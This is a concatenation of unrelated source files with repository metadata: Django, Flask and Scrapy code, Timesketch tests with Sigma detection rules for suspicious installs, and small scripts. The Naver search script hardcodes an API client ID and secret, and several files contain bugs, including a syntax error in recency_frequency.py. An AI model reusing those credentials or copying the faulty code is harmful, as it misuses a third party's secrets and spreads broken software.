from workers import views from workers.views import Login,RegistrationView,ProfileDetailView,JobsView from django.urls import path app_name = 'workers' urlpatterns = [ path('register/', RegistrationView.as_view(), name='worker_user' ), path('login2/', Login.as_view(), name='login2' ), path('profile/me/', ProfileDetailView.as_view(is_me=True), name='me' ), path('profile/<int:pk>/', ProfileDetailView.as_view(), name='user_profile' ), path('Jobs/', JobsView.as_view(), name='Jobs' ), ]
[ "71964561+fatima2030@users.noreply.github.com" ]
71964561+fatima2030@users.noreply.github.com
2fd3bcd0b1e0a265de56a4a6fcf68eb7015bb7eb
98c6ea9c884152e8340605a706efefbea6170be5
/examples/data/Assignment_6/sngakh004/question4.py
64ef79e9395c406a90e97ab814688ab603b0c013
[]
no_license
MrHamdulay/csc3-capstone
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
refs/heads/master
2021-03-12T21:55:57.781339
2014-09-22T02:22:22
2014-09-22T02:22:22
22,372,174
0
0
null
null
null
null
UTF-8
Python
false
false
985
py
"""Akhil Singh SNGAKH004 Program to draw a histogram of class mark data. 23 April 2014""" #Get class marks from user class_mark=input("Enter a space-separated list of marks:\n") #Converting a string into a list of intergers class_mark=class_mark.split() for a in range(len(class_mark)): class_mark[a]=eval(class_mark[a]) #Specifying acumulators for variables first = 0 upper_second = 0 lower_second = 0 third = 0 fail = 0 #Determining the place of marks for m in class_mark: if m >= 75: first = first +1 elif m >= 70: upper_second =upper_second + 1 elif m >= 60: lower_second =lower_second+ 1 elif m >= 50: third=third + 1 else: fail=fail+ 1 #Print histogram. print("1 |", "X"*first, sep = "") print("2+|", "X"*upper_second, sep = "") print("2-|", "X"*lower_second, sep = "") print("3 |", "X"*third, sep = "") print("F |", "X"*fail, sep = "")
[ "jarr2000@gmail.com" ]
jarr2000@gmail.com
4370fe568105d6947b4b17e170453c6a279fbf30
3f3471faa4a693fb18adb651500753f637ab1916
/book.py
65bdcf54cb5837e194d347af766617add40fcbf4
[]
no_license
sarte3/pj5
1f7a54fc5a6e78a3e803416787ea32c3626761cd
afdb2dd49292c8647f9dec5a061a8d4f1bba06d7
refs/heads/master
2023-03-06T04:11:22.607225
2021-02-25T05:17:36
2021-02-25T05:17:36
342,131,195
0
0
null
null
null
null
UTF-8
Python
false
false
1,384
py
from datetime import datetime import pandas as pd import matplotlib.pyplot as plt # 한글처리 from matplotlib import font_manager, rc fontname = font_manager.FontProperties(fname='malgun.ttf').get_name() rc('font', family=fontname) import json import os import sys import urllib.request client_id = "twrhEE4LU8HoKxIrMwzM" client_secret = "hsPSocfNRK" encText = urllib.parse.quote("파이썬") url = "https://openapi.naver.com/v1/search/book.json?display=100&query=" + encText # json 결과 # url = "https://openapi.naver.com/v1/search/blog.xml?query=" + encText # xml 결과 request = urllib.request.Request(url) request.add_header("X-Naver-Client-Id",client_id) request.add_header("X-Naver-Client-Secret",client_secret) response = urllib.request.urlopen(request) rescode = response.getcode() if(rescode==200): response_body = response.read() result = response_body.decode('utf-8') else: print("Error Code:" + rescode) dic = json.loads(result) # print(dic) # 1) 네이버 개발자 센터에서 파이썬 책을 검색하여 # 책 제목, 출판사, 가격, isbn열을 데이터프레임 df로 생성하세요. items = dic['items'] df=pd.DataFrame(items) df = df[['title', 'publisher', 'price', 'isbn']] print(df) # 2) 출판사별 가격의 평균을 출력하세요 df['price']=pd.to_numeric(df['price']) g1 = df.groupby('publisher')['price'].mean() print(g1)
[ "sarte@outlook.kr" ]
sarte@outlook.kr
d864b1f1950e3c4adba5e11db324cb046ce4f2db
bb2fe96e921cf6e9b29026a4b4ff13ec683b8211
/heartrisk.py
70ddf43f662ad125b0d35de9dc48f1a5b22abf51
[]
no_license
vinayaklal98/Heart-Disease-Risk-Prediction-
bf4fb7ee969fb26b65cee813652a9b17824d5595
63e93f44fc14c193f65a57869ac8420b24e1f602
refs/heads/master
2023-02-05T15:05:06.157969
2020-12-30T06:51:23
2020-12-30T06:51:23
325,477,682
0
0
null
null
null
null
UTF-8
Python
false
false
1,031
py
from flask import Flask,render_template,request import joblib import numpy as np import warnings warnings.filterwarnings("ignore") model=joblib.load('heart_risk_prediction_regression_model.sav') app = Flask(__name__) @app.route('/',methods=['GET']) def index(): return render_template("patient_details.html") @app.route('/getresults',methods=['GET','POST']) def results(): result=request.form name=result['name'] gender=float(result['gender']) age=float(result['age']) tc=float(result['tc']) hdl=float(result['hdl']) sbp=float(result['sbp']) smoke=float(result['smoke']) bpm=float(result['bpm']) diab=float(result['diab']) test_data=np.array([gender,age,tc,hdl,smoke,bpm,diab]).reshape(-1,1) prediction=model.predict(test_data) prediction = max(prediction,0) resultDict={"name":name,"risk":round(prediction[0][0],2)} return render_template('patient_results.html',results=resultDict) if __name__ == "__main__": app.run(debug=True)
[ "vinayaklal98@gmail.com" ]
vinayaklal98@gmail.com
e548f54d3a7c8da2d51938e1da6415835d9d5685
94f156b362fbce8f89c8e15cd7687f8af267ef08
/midterm/main/permissions.py
57ee4beb272ac8cfc9255ea149ac2f53b1a21476
[]
no_license
DastanB/AdvancedDjango
6eee5477cd5a00423972c9cc3d2b5f1e4a501841
2b5d4c22b278c6d0e08ab7e84161163fe42e9a3f
refs/heads/master
2020-07-17T19:21:16.271964
2019-12-03T21:58:51
2019-12-03T21:58:51
206,081,522
0
0
null
null
null
null
UTF-8
Python
false
false
1,228
py
from rest_framework.permissions import IsAuthenticated, BasePermission from users.models import MainUser class ProductPermission(BasePermission): message = 'You must be the authenticated.' def has_permission(self, request, view): if view.action is 'create': return request.user.is_superuser or request.user.is_store_admin return request.user.is_authenticated def has_object_permission(self, request, view, obj): if not request.user.is_authenticated: return False if view.action is not 'retrieve': return request.user.is_superuser or request.user.is_store_admin return True class ServicePermission(BasePermission): message = 'You must be authenticated.' def has_permission(self, request, view): if view.action is 'create': return request.user.is_superuser or request.user.is_store_admin return request.user.is_authenticated def has_object_permission(self, request, view, obj): if not request.user.is_authenticated: return False if view.action is not 'retrieve': return request.user.is_superuser or request.user.is_store_admin return True
[ "dastan211298@gmail.com" ]
dastan211298@gmail.com
754a283bfa2fe8ab5210ac909f41b2f0798b8fd7
6902af02d25bb26f091a3f2674af0f903210e461
/manage.py
01f2b400bb4a31395b2de1ae8eebfdcb7ea60394
[]
no_license
ahmadebtisam3/django-redis-chasing
5b14a9134a6f5f0cbe0bb416d94af128472aa7dd
5c271ca426509a6d73187898594e83b11f756ee8
refs/heads/master
2023-08-14T14:45:04.574871
2021-09-30T10:59:21
2021-09-30T10:59:21
412,029,465
0
0
null
null
null
null
UTF-8
Python
false
false
668
py
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): """Run administrative tasks.""" os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'RedisCashing.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
[ "ahmadebtisam3@gmail.com" ]
ahmadebtisam3@gmail.com
0d7a29612c94c3aff018646361474a2b36fa2b89
ebaf0a5aa1814214cd362d9eefd4dcfc865373f9
/rf-main/src/recency_frequency.py
726b069cb39d6a509edcccf2db976c24ef4827f3
[ "MIT" ]
permissive
sfnanalytics/rf
5aedcc0e866aa0bfd48ae209b64aa7d1a52464d7
b17593070e371e98ca3c552711e4cc87ad010860
refs/heads/main
2023-04-01T16:41:49.545640
2021-04-13T19:32:51
2021-04-13T19:32:51
351,134,141
0
0
null
null
null
null
UTF-8
Python
false
false
2,188
py
# Membership Recency + Frequency # Membership Recency + Frequency import pandas as pd import glob import os import sys path = os.getcwd() # use your path all_files = glob.glob(path + "/*.xlsx") # print(all_files) li = [] for filename in all_files: df = pd.read_excel(filename, #engine='openpyxl', skiprows=2) new_header = df.iloc[1] #grab the first row for the header df.dropna(subset=['individual_id'], inplace=True) #take the data less empty values # print(df.head) # print(100*'-') # df.columns = new_header #set the header row as the df header li.append(df) frame = pd.concat(li, axis=0, ignore_index=True) = frame[frame['individual_id'].notna()] people.drop_duplicates(inplace=True) people.shape people.tail() print(people.shape) people = people.set_index('individual_id') # people['Membership Year'].value_counts() # #### 116,880 total Meeting Attendees since 2015 # # Using individual_id as Index allows for the following aggregate to run properly people['Last Membership'] = pd.to_numeric(people.groupby(['individual_id'], sort=False)['Membership Year'].max()) people['Recency'] = 2021 - people['Last Membership'] people['Frequency'] = pd.to_numeric(people.groupby(['individual_id'], sort=False)['Membership Year'].count()) final_membership_rf = people[['first_last_name','primary_email_address','Last Membership','Frequency', 'Recency', 'Membership Product Group', 'Primary Member Type','Country', 'Membership Year']] # print(final_membership_rf.shape) final_membership_rf.sample(10) # Does this include all 2020 members? I filtered for last membership 2020 and 2 year membership and I am only getting approx. 3800 records but we had 14000 2 years members in 2020. So I was wondering if we intentionally omitted some people. # final_membership_rf['Last Membership'].value_counts() # final_membership_rf[['Membership Year', 'Membership Product Group']].value_counts() # final_membership_rf.drop_duplicates(inplace=True) final_membership_rf.to_csv('MembershipRecencyFrequency_w_Product.csv', index=True) print("Shape:", final_membership_rf.shape) print(final_membership_rf.sample(5)) print(100*'-') print("Complete!")
[ "jweinapple@sfn.org" ]
jweinapple@sfn.org
f0e40c9efa5cf541e7b15f1bd98727ed54f47496
e98ca69c0c517098f21f8e780b65a25b866a6975
/end_to_end_tests/client_test.py
12ec6696f8fe7055c63efa19d021abaa7b622d0d
[ "Apache-2.0" ]
permissive
wajihyassine/timesketch
6db935f34324d64da10106088509faa400888546
e508b6a3e60e54bac50d275dd93d6c1c6c0359d1
refs/heads/master
2023-06-22T00:36:01.245595
2023-06-09T14:12:49
2023-06-09T14:12:49
213,988,343
0
0
Apache-2.0
2019-10-09T18:01:29
2019-10-09T18:01:28
null
UTF-8
Python
false
false
10,440
py
# Copyright 2020 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """End to end tests of Timesketch client functionality.""" import json import time from timesketch_api_client import search from . import interface from . import manager class ClientTest(interface.BaseEndToEndTest): """End to end tests for client functionality.""" NAME = "client_test" def test_client(self): """Client tests.""" expected_user = "test" user = self.api.current_user self.assertions.assertEqual(user.username, expected_user) self.assertions.assertEqual(user.is_admin, False) self.assertions.assertEqual(user.is_active, True) sketches = list(self.api.list_sketches()) number_of_sketches = len(sketches) sketch_name = "Testing" sketch_description = "This is truly a foobar" new_sketch = self.api.create_sketch( name=sketch_name, description=sketch_description ) self.assertions.assertEqual(new_sketch.name, sketch_name) self.assertions.assertEqual(new_sketch.description, sketch_description) sketches = list(self.api.list_sketches()) self.assertions.assertEqual(len(sketches), number_of_sketches + 1) for index in self.api.list_searchindices(): if index is None: continue self.assertions.assertTrue(bool(index.index_name)) def test_direct_opensearch(self): """Test injecting data into OpenSearch directly.""" index_name = "direct_testing" self.import_directly_to_opensearch( filename="evtx_direct.csv", index_name=index_name ) new_sketch = self.api.create_sketch( name="Testing Direct", description="Adding data directly from ES" ) context = "e2e - > test_direct_opensearch" timeline_name = "Ingested Via Mechanism" timeline = new_sketch.generate_timeline_from_es_index( es_index_name=index_name, name=timeline_name, provider="end_to_end_testing_platform", context=context, ) _ = new_sketch.lazyload_data(refresh_cache=True) self.assertions.assertEqual(len(new_sketch.list_timelines()), 1) self.assertions.assertEqual(timeline.name, timeline_name) data_sources = timeline.data_sources self.assertions.assertEqual(len(data_sources), 1) data_source = data_sources[0] self.assertions.assertEqual(data_source.get("context", ""), context) def test_create_sigma_rule(self): """Create a Sigma rule in database""" MOCK_SIGMA_RULE = """ title: Suspicious Installation of bbbbbb id: 5266a592-b793-11ea-b3de-bbbbbb description: Detects suspicious installation of bbbbbb references: - https://rmusser.net/docs/ATT&CK-Stuff/ATT&CK/Discovery.html author: Alexander Jaeger date: 2020/06/26 modified: 2022/06/12 logsource: product: linux service: shell detection: keywords: # Generic suspicious commands - '*apt-get install bbbbbb*' condition: keywords falsepositives: - Unknown level: high """ rule = self.api.create_sigmarule(rule_yaml=MOCK_SIGMA_RULE) self.assertions.assertIsNotNone(rule) def test_sigmarule_list(self): """Client Sigma list tests.""" rules = self.api.list_sigmarules() self.assertions.assertGreaterEqual(len(rules), 1) rule = rules[0] self.assertions.assertIn("Installation of bbbbbb", rule.title) self.assertions.assertIn("installation of bbbbbb", rule.description) def test_get_sigmarule(self): """Client Sigma object tests.""" rule = self.api.create_sigmarule( rule_yaml=""" title: Suspicious Installation of eeeee id: 5266a592-b793-11ea-b3de-eeeee description: Detects suspicious installation of eeeee references: - https://rmusser.net/docs/ATT&CK-Stuff/ATT&CK/Discovery.html author: Alexander Jaeger date: 2020/06/26 modified: 2022/06/12 logsource: product: linux service: shell detection: keywords: # Generic suspicious commands - '*apt-get install zmap*' condition: keywords falsepositives: - Unknown level: high """ ) self.assertions.assertIsNotNone(rule) rule = self.api.get_sigmarule(rule_uuid="5266a592-b793-11ea-b3de-eeeee") rule.from_rule_uuid("5266a592-b793-11ea-b3de-eeeee") self.assertions.assertGreater(len(rule.attributes), 5) self.assertions.assertIsNotNone(rule) self.assertions.assertIn("Alexander", rule.author) self.assertions.assertIn("Alexander", rule.get_attribute("author")) self.assertions.assertIn("b793-11ea-b3de-eeeee", rule.id) self.assertions.assertIn("Installation of eeeee", rule.title) self.assertions.assertIn("zmap", rule.search_query) self.assertions.assertIn("shell:zsh:history", rule.search_query) self.assertions.assertIn("sigmarules/5266a592", rule.resource_uri) self.assertions.assertIn("installation of eeeee", rule.description) self.assertions.assertIn("high", rule.level) self.assertions.assertEqual(len(rule.falsepositives), 1) self.assertions.assertIn("Unknown", rule.falsepositives[0]) self.assertions.assertIn("2020/06/26", rule.date) self.assertions.assertIn("2022/06/12", rule.modified) self.assertions.assertIn("high", rule.level) self.assertions.assertIn("rmusser.net", rule.references[0]) self.assertions.assertEqual(len(rule.detection), 2) self.assertions.assertEqual(len(rule.logsource), 2) # Test an actual query self.import_timeline("sigma_events.csv") search_obj = search.Search(self.sketch) search_obj.query_string = rule.search_query data_frame = search_obj.table count = len(data_frame) self.assertions.assertEqual(count, 1) def test_add_event_attributes(self): """Tests adding attributes to an event.""" sketch = self.api.create_sketch(name="Add event attributes test") sketch.add_event("event message", "2020-01-01T00:00:00", "timestamp_desc") # Wait for new timeline and event to be created, retrying 5 times. for _ in range(5): search_client = search.Search(sketch) search_response = json.loads(search_client.json) objects = search_response.get("objects") if objects: old_event = search_response["objects"][0] break time.sleep(1) else: raise RuntimeError("Event creation failed for test.") events = [ { "_id": old_event["_id"], "_index": old_event["_index"], "_type": old_event["_type"], "attributes": [{"attr_name": "foo", "attr_value": "bar"}], } ] response = sketch.add_event_attributes(events) new_event = sketch.get_event(old_event["_id"], old_event["_index"]) self.assertions.assertEqual( response, { "meta": { "attributes_added": 1, "chunks_per_index": {old_event["_index"]: 1}, "error_count": 0, "last_10_errors": [], "events_modified": 1, }, "objects": [], }, ) self.assertions.assertIn("foo", new_event["objects"]) def test_add_event_attributes_invalid(self): """Tests adding invalid attributes to an event.""" sketch = self.api.create_sketch(name="Add invalid attributes test") sketch.add_event( "original message", "2020-01-01T00:00:00", "timestamp_desc", attributes={"existing_attr": "original_value"}, ) # Wait for new timeline and event to be created, retrying 5 times. for _ in range(5): search_client = search.Search(sketch) search_response = json.loads(search_client.json) objects = search_response.get("objects") if objects: old_event = search_response["objects"][0] break time.sleep(1) else: raise RuntimeError("Event creation failed for test.") # Have to use search to get event_id search_client = search.Search(sketch) search_response = json.loads(search_client.json) old_event = search_response["objects"][0] events = [ { "_id": old_event["_id"], "_index": old_event["_index"], "_type": old_event["_type"], "attributes": [ {"attr_name": "existing_attr", "attr_value": "new_value"}, {"attr_name": "message", "attr_value": "new message"}, ], } ] response = sketch.add_event_attributes(events) # Confirm the error lines are generated for the invalid attributes. self.assertions.assertIn( f"Attribute 'existing_attr' already exists for event_id " f"'{old_event['_id']}'.", response["meta"]["last_10_errors"], ) self.assertions.assertIn( f"Cannot add 'message' for event_id '{old_event['_id']}', name not " f"allowed.", response["meta"]["last_10_errors"], ) new_event = sketch.get_event(old_event["_id"], old_event["_index"]) # Confirm attributes have not been changed. self.assertions.assertEqual(new_event["objects"]["message"], "original message") self.assertions.assertEqual( new_event["objects"]["existing_attr"], "original_value" ) manager.EndToEndTestManager.register_test(ClientTest)
[ "noreply@github.com" ]
wajihyassine.noreply@github.com
67d522dfc5a4b2ef058c2780218d6e3a6643b97a
8ed1cc347a70ecfcc8b1510c036244539bd0227b
/request.py
7fc89045b60758747835a4afe60c35ac0387c87e
[]
no_license
thatdanish/Keras-RestAPI_eg_ResNet50
efa59ea0655d79c281559903b1725141657178b8
6027cb6bd1f497bf9a4bdd8fe0d51775c6fd5e59
refs/heads/master
2022-11-15T07:30:08.530558
2020-07-11T05:37:56
2020-07-11T05:37:56
278,796,100
0
0
null
null
null
null
UTF-8
Python
false
false
330
py
import requests url = 'http://localhost:3000/predict' image_path = 'dog.jfif' image = open(image_path,'rb').read() payload = {'image':image} r = requests.post(url,files=payload).json() if r['success']: for (i,result) in enumerate(r['predictions']): print(i,result) else: print('Request Failed')
[ "noreply@github.com" ]
thatdanish.noreply@github.com
aa228be134ad0fd021196aa26da34874f256bab8
15c24ee280cadc05b9db7c5b79fde298d583e17d
/spider/test1/test1/items.py
407f6df6cde41628ca281793e108f1b52a3ba5a0
[ "Apache-2.0" ]
permissive
shyorange/MovieWebsite
b0476547fd46726d8f1be75b56068d43c7eae867
aaf3be332b9f944ea93fbd841e1758b4a11d4581
refs/heads/master
2020-04-12T09:48:37.475528
2019-01-05T10:22:48
2019-01-05T10:22:48
162,408,888
0
0
null
null
null
null
UTF-8
Python
false
false
1,394
py
# -*- coding: utf-8 -*- # Define here the models for your scraped items # # See documentation in: # https://doc.scrapy.org/en/latest/topics/items.html import scrapy # 电影天堂的Item类 class Test1Item(scrapy.Item): # define the fields for your item here like: # name = scrapy.Field() movie_name = scrapy.Field(); movie_link = scrapy.Field(); update_time = scrapy.Field(); # 电影分类 movie_type = scrapy.Field(); # 一个包含分类的列表 # 电影详情页的数据 movie_image = scrapy.Field(); # 电影封面连接 movie_downlink = scrapy.Field(); # 电影下载连接,一个列表 # 天堂图片的Item类 class TTimgItem(scrapy.Item): image_class = scrapy.Field(); # 图片所属的分类名 detail_link = scrapy.Field(); # 详情页链接 image_link = scrapy.Field(); # 详情页内每个图片的链接 image_dir = scrapy.Field(); # 根据分类名获得文件夹名 # 天天美剧的Item类 class TTmeiju(scrapy.Item): v_name = scrapy.Field(); # 电影名 v_img = scrapy.Field(); # 封面 v_actor = scrapy.Field(); # 主演 v_dir = scrapy.Field(); # 导演 v_reg = scrapy.Field(); # 地区 v_year = scrapy.Field(); # 年份 v_intr = scrapy.Field(); # 简介 video_links = scrapy.Field(); # 视频详情连接(视频连接或m3u8文件连接)
[ "mr.fatter@qq.com" ]
mr.fatter@qq.com
362fdceb16b7af2c8c4fd778a23f14a23f4e918d
a0ea7bc7ec0fa0ca5a0a1624f7c853bbcf1180da
/statsboard.py
35a271daabc757b3c9cd3eda4aac8414cd9ec55c
[]
no_license
frogfather78/Questy_quest
2a2dbcf9da91addcf63d54aefcb1a0e525f78fda
b826f3a40228de7fbcd4866d6370b7d194d2a234
refs/heads/master
2020-08-01T14:15:00.756965
2020-06-07T20:34:35
2020-06-07T20:34:35
73,573,936
0
0
null
2018-05-31T16:11:43
2016-11-12T19:33:58
Python
UTF-8
Python
false
false
2,046
py
import pygame.font from pygame.sprite import Group from quester import Quester level_limits = [0, 10, 100, 300] class Statsboard(): """to show quester's stats""" def __init__(self, screen, quester): """set up some things for the board""" self.screen = screen self.screen_rect = screen.get_rect() #font settings for scoring information self.text_colour = (255, 255, 255) self.bg_colour = (0,0,0) self.font = pygame.font.SysFont(None, 20) self.prep_stats(quester) def prep_stats(self,quester): """set up stats as a renderable image""" #create strings for stats hp_str = ("HP: " + str(quester.hp)+"/"+ str(quester.max_hp)) xp_str = ("XP: " + str(quester.xp)+"/"+ str(level_limits[quester.level])) level_str = ("Level: " + str(quester.level)) stats_str = ("s: " + str(quester.strength) + " m: " + str(quester.magic)) #render images self.hp_image = self.font.render(hp_str, True, self.text_colour, self.bg_colour) self.xp_image = self.font.render(xp_str, True, self.text_colour, self.bg_colour) self.level_image = self.font.render(level_str, True, self.text_colour, self.bg_colour) self.stats_image = self.font.render(stats_str, True, self.text_colour, self.bg_colour) #put the images to the top left of the screen self.hp_rect = self.hp_image.get_rect() self.xp_rect = self.xp_image.get_rect() self.level_rect = self.level_image.get_rect() self.stats_rect = self.stats_image.get_rect() self.hp_rect.left = self.screen_rect.left + 5 self.hp_rect.top = 20 self.xp_rect.left = self.screen_rect.left + 5 self.xp_rect.top = 35 self.level_rect.left = self.screen_rect.left + 5 self.level_rect.top = 50 self.stats_rect.left = self.screen_rect.left + 5 self.stats_rect.top = 65 def show_stats(self): """draw the stats onto the screen""" self.screen.blit(self.hp_image, self.hp_rect) self.screen.blit(self.xp_image, self.xp_rect) self.screen.blit(self.level_image, self.level_rect) self.screen.blit(self.stats_image, self.stats_rect)
[ "frogfather@gmail.com" ]
frogfather@gmail.com
ef9ccaa8e5773f7b498712d204a323eb30753369
58c2d945597308d985b1d95166c1eb743c4ff0dd
/ddw_crawler/ddw_crawler/middlewares.py
a8e9efd8f2a125f150db4297dec43eb4a690d6ab
[ "MIT" ]
permissive
ggljzr/scrapy-spider
b96a9a3ce62c9cbed2e1f8abb80951ca7a14276f
a9c3a488671451fc6df328b2b8e2656ea12824e5
refs/heads/master
2020-05-21T10:15:38.204426
2017-03-12T11:02:44
2017-03-12T11:02:44
84,613,881
0
0
null
null
null
null
UTF-8
Python
false
false
1,884
py
# -*- coding: utf-8 -*- # Define here the models for your spider middleware # # See documentation in: # http://doc.scrapy.org/en/latest/topics/spider-middleware.html from scrapy import signals class DdwCrawlerSpiderMiddleware(object): # Not all methods need to be defined. If a method is not defined, # scrapy acts as if the spider middleware does not modify the # passed objects. @classmethod def from_crawler(cls, crawler): # This method is used by Scrapy to create your spiders. s = cls() crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) return s def process_spider_input(response, spider): # Called for each response that goes through the spider # middleware and into the spider. # Should return None or raise an exception. return None def process_spider_output(response, result, spider): # Called with the results returned from the Spider, after # it has processed the response. # Must return an iterable of Request, dict or Item objects. for i in result: yield i def process_spider_exception(response, exception, spider): # Called when a spider or process_spider_input() method # (from other spider middleware) raises an exception. # Should return either None or an iterable of Response, dict # or Item objects. pass def process_start_requests(start_requests, spider): # Called with the start requests of the spider, and works # similarly to the process_spider_output() method, except # that it doesn’t have a response associated. # Must return only requests (not items). for r in start_requests: yield r def spider_opened(self, spider): spider.logger.info('Spider opened: %s' % spider.name)
[ "cerveon3@fit.cvut.cz" ]
cerveon3@fit.cvut.cz
4523705994d512150e1159dc7a4886ab6ee31be1
8804ceaa8b2c136cc92f7eb4ef633f20cc505cc6
/ddby/money.py
9480a5f8a8b8ddfde257068f8e12c20166d37e2f
[]
no_license
shazow/ddby
7e1186e711b74d5d7f4f5ae73251d64b08238fd2
3a06b63404fc403c8ab27e3fcbc62fc6c5e855fc
refs/heads/master
2020-02-26T14:48:13.468787
2013-03-28T03:39:18
2013-03-28T03:39:18
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,399
py
# -*- coding: utf-8 -*- from .error import InvalidOperationException from .currency import get_currency, Currency __all__ = ['Money'] class Money(object): "An object representing money" def __init__(self, amount, currency): if isinstance(currency, basestring): # Currency code was passed in. Go look it up. currency = get_currency(currency) self.amount = self._get_amount(amount, currency.precision) self.currency = currency # Override functions to cast to data types def __int__(self): "Cast the Money object to an int" return self.amount def __float__(self): "Cast the Money object to a float" # TODO: make sure the rounding is proper based on precision return round( float(self.amount / pow(10, self.currency.precision) ), self.currency.precision) # Override numeric operations def __add__(self, other): if isinstance(other, Money): self._assert_same_currency(other.currency) return Money( self.amount + other.amount, self.currency ) amount = self._get_amount(other, self.currency.precision) return Money(self.amount + amount, self.currency) def __sub__(self, other): if isinstance(other, Money): self._assert_same_currency(other.currency) return Money( self.amount - other.amount, self.currency ) amount = self._get_amount(other, self.currency.precision) return Money(self.amount - amount, self.currency) def __eq__(self, other): self._assert_same_currency(other.currency) return (self.amount == other.amount) def __ne__(self, other): return not (self == other) def __lt__(self, other): self._assert_same_currency(other.currency) return (self.amount < other.amount) def __gt__(self, other): self._assert_same_currency(other.currency) return (self.amount > other.amount) def __lte__(self, other): self._assert_same_currency(other.currency) return (self.amount <= other.amount) def __gte__(self, other): self._assert_same_currency(other.currency) return (self.amount >= other.amount) def __str__(self): return u"{0}{1:.2f} {2}".format( self.currency.symbol, float(self), self.currency.code ).encode('utf-8') def __unicode__(self): return u"{0}{1:.2f} {2}".format( self.currency.symbol, float(self), self.currency.code ) def __repr__(self): return u"Money<{0}, {1}>".format( self.amount, self.currency_code ).encode('utf-8') def __nonzero__(self): return bool(self.amount) # Helper functions def _assert_same_currency(self, currency): if self.currency != currency: raise InvalidOperationException("Currencies are not the same") def _get_amount(self, amount, precision): if isinstance(amount, int): return amount elif isinstance(amount, float): return int(amount * pow(10, precision)) else: raise InvalidOperationException("Amount is not an int or float")
[ "brian@btoconnor.net" ]
brian@btoconnor.net
7bbe3d2066efd578b09eee3aee8ab3d57cc65694
c95310db610fd4ca1899903d3982d0733c2c693d
/problems/reverse_bits/solution.py
5fbfca10974c1a7d264cfe02ae82088da1d3273a
[]
no_license
findcongwang/leetcode
e8cbc8899a6af2134de66d6ff1a1ead4c10d38e6
f52ea63fc0680613a3ebf3f3b4e4f1be7bbfd87c
refs/heads/main
2023-02-25T17:33:41.270128
2021-01-29T17:57:15
2021-01-29T17:57:15
306,998,473
0
0
null
null
null
null
UTF-8
Python
false
false
221
py
class Solution: def reverseBits(self, n: int) -> int: count = 31 num = 0 while n > 0: num = num + ((n&1) * 2**count) n = n >> 1 count -= 1 return num
[ "findcongwang@gmail.com" ]
findcongwang@gmail.com
8b8bf90de1cd2ddf69c3dc799118a8896b9a845e
3a796615364d0f6d3053b0fce5748301399923a3
/toos/blast生成/blast.py
80851279b1f9eedcd6262aaa62de30ca4626eb73
[]
no_license
lkiko/data
d1df57c17cc7f44e5552d94ca2308b13a966cc17
d0405c612b4b642cacac0afb757bcfcb7b38a9ad
refs/heads/master
2022-12-19T03:18:34.626267
2020-09-16T01:43:53
2020-09-16T01:43:53
295,779,980
0
0
null
null
null
null
UTF-8
Python
false
false
1,083
py
#coding = utf-8 ##blast.py调用cmd执行blast #基础文件为faa和物种列表 ### ###by charles lan### ###邮箱:charles_kiko@163.com### ### import os from multiprocessing import cpu_count#读取CPU核心数用于匹配线程数 name=[] for line in open("test.txt",mode='r'):################# x=line if (x!='' and x!="\n"): x=x.strip("\n") lt=x.split("\t") name.append(str(lt[0])) name.append(str(lt[1])) print(name) cpu=str(cpu_count()) for i in range(int(len(name)/2)): library=str(name[(i*2)-1]) db=library[:-4]+".library" print("makeblastdb -in %s -dbtype prot -out %s" % (library,db)) d=os.popen("makeblastdb -in %s -dbtype prot -out %s" % (library,db)).read().strip() blast=str(name[i*2]) result=library[:-4]+"_"+blast[:-4]+".1e-5.blast" print("blastp -query %s -db %s -out %s -outfmt 6 -evalue 1e-5 -num_threads %s" % (blast,db,result,cpu)) d=os.popen("blastp -query %s -db %s -out %s -outfmt 6 -evalue 1e-5 -num_threads %s" % (blast,db,result,cpu)).read().strip() print(library[:-4]+"_"+blast[:-4]+"blast结束!") print('程序运行结束!!!')
[ "2177727470@qq.com" ]
2177727470@qq.com
acc0a1be6531ff69b956ab61565fa4ebda0839ee
5cc94ad2377777067e7e9fad08823f201b790a63
/github-backup
94c4a4a40db48d1d39243f0149b93648e9e996ca
[]
no_license
rrosajp/github-backup
86ea44a6addd24072cfe150de2be4c4a71310720
a538de0bd0a29b82f4cc669cf60132aa83548469
refs/heads/master
2022-03-17T23:15:25.856395
2019-11-27T19:02:35
2019-11-27T19:02:35
273,772,938
1
0
null
2020-06-20T19:37:44
2020-06-20T19:37:43
null
UTF-8
Python
false
false
4,511
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # github_backup.py # # Copyright 2017 Spencer McIntyre <zeroSteiner@gmail.com> # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY 